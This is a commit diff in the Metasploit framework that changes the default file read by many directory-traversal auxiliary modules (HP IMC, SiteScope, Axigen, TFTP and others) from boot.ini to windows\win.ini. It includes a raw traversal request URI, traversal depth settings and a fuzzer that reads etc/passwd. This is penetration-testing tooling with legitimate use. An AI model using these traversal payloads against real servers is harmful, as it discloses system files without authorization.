commit
28aa7429ed
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
true,
|
||||
"The remote filesystem path to download",
|
||||
"C:\\boot.ini"
|
||||
"C:\\Windows\\win.ini"
|
||||
]
|
||||
),
|
||||
OptString.new('LPATH',
|
||||
|
|
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('TARGETURI',[ true, 'Path to Axigen WebAdmin', '/' ]),
|
||||
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
|
||||
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
|
||||
OptString.new('PATH', [ true, 'The file to read or delete', "\\boot.ini" ])
|
||||
OptString.new('PATH', [ true, 'The file to read or delete', "\\windows\\win.ini" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../windows\\win.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
|
||||
|
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res.code >= 200)
|
||||
if (res.body =~ /boot/)
|
||||
if (res.body =~ /for 16-bit app support/)
|
||||
vuln = "vulnerable."
|
||||
else
|
||||
vuln = "not vulnerable."
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
# By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 5])
|
||||
], self.class)
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(21),
|
||||
OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),
|
||||
OptString.new('PATH', [ true, "Path to the file to disclose, releative to the root dir.", 'boot.ini'])
|
||||
OptString.new('PATH', [ true, "Path to the file to disclose, releative to the root dir.", 'windows\\win.ini'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8161),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
|
||||
], self.class)
|
||||
end
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(7181), # Also 7180 can be used
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 10])
|
||||
], self.class)
|
||||
end
|
||||
|
|
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 6])
|
||||
], self.class)
|
||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 7])
|
||||
], self.class)
|
||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 7])
|
||||
], self.class)
|
||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
|
||||
# By default files downloaded from C:\Program Files\iMC\client\bin\
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 4])
|
||||
], self.class)
|
||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
|
||||
OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\boot.ini'])
|
||||
OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\windows\\win.ini'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\boot.ini']),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini']),
|
||||
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
|
||||
], self.class)
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\boot.ini']),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini']),
|
||||
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']),
|
||||
], self.class)
|
||||
|
||||
|
|
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Initialize the default file(s) we should try to read during fuzzing
|
||||
if datastore['FILE'].empty?
|
||||
file_to_read = ['etc/passwd', 'boot.ini']
|
||||
file_to_read = ['etc/passwd', 'boot.ini', 'windows\\win.ini']
|
||||
else
|
||||
file_to_read = [datastore['FILE']]
|
||||
end
|
||||
|
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(6060),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini'])
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'windows\\win.ini'])
|
||||
], self.class)
|
||||
|
||||
deregister_options('RHOST')
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3037),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'boot.ini']),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'windows\\win.ini']),
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 6])
|
||||
], self.class)
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3037),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\boot.ini'])
|
||||
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])
|
||||
], self.class)
|
||||
|
||||
register_autofilter_ports([ 3037 ])
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'windows\\win.ini']),
|
||||
OptInt.new('DEPTH', [true, 'The max traversal depth', 8])
|
||||
], self.class)
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(9084),
|
||||
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
|
||||
OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini'])
|
||||
OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('FILEPATH', [false, 'The name of the file to download', 'boot.ini'])
|
||||
OptString.new('FILEPATH', [false, 'The name of the file to download', 'windows\\win.ini'])
|
||||
], self.class)
|
||||
|
||||
deregister_options('RHOST')
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('RFILE', [true, 'Remote File', '/boot.ini']),
|
||||
OptString.new('RFILE', [true, 'Remote File', '/windows\\win.ini']),
|
||||
OptInt.new('DEPTH', [true, 'Traversal depth', 3])
|
||||
], self.class)
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(69),
|
||||
OptString.new('FILENAME', [false, 'The file to loot', 'boot.ini']),
|
||||
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
|
||||
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
|
||||
], self.class)
|
||||
end
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(69),
|
||||
OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),
|
||||
OptString.new('FILENAME', [false, 'The file to loot', 'boot.ini']),
|
||||
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue